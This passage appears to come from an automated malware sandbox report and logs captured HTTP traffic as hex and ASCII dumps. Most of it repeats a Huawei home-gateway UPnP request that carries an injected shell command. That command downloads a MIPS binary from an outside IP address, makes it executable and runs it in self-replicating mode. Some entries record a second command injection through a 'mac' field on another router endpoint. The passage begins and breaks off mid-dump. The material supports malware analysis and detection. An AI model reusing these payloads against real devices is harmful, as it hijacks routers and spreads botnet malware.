6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 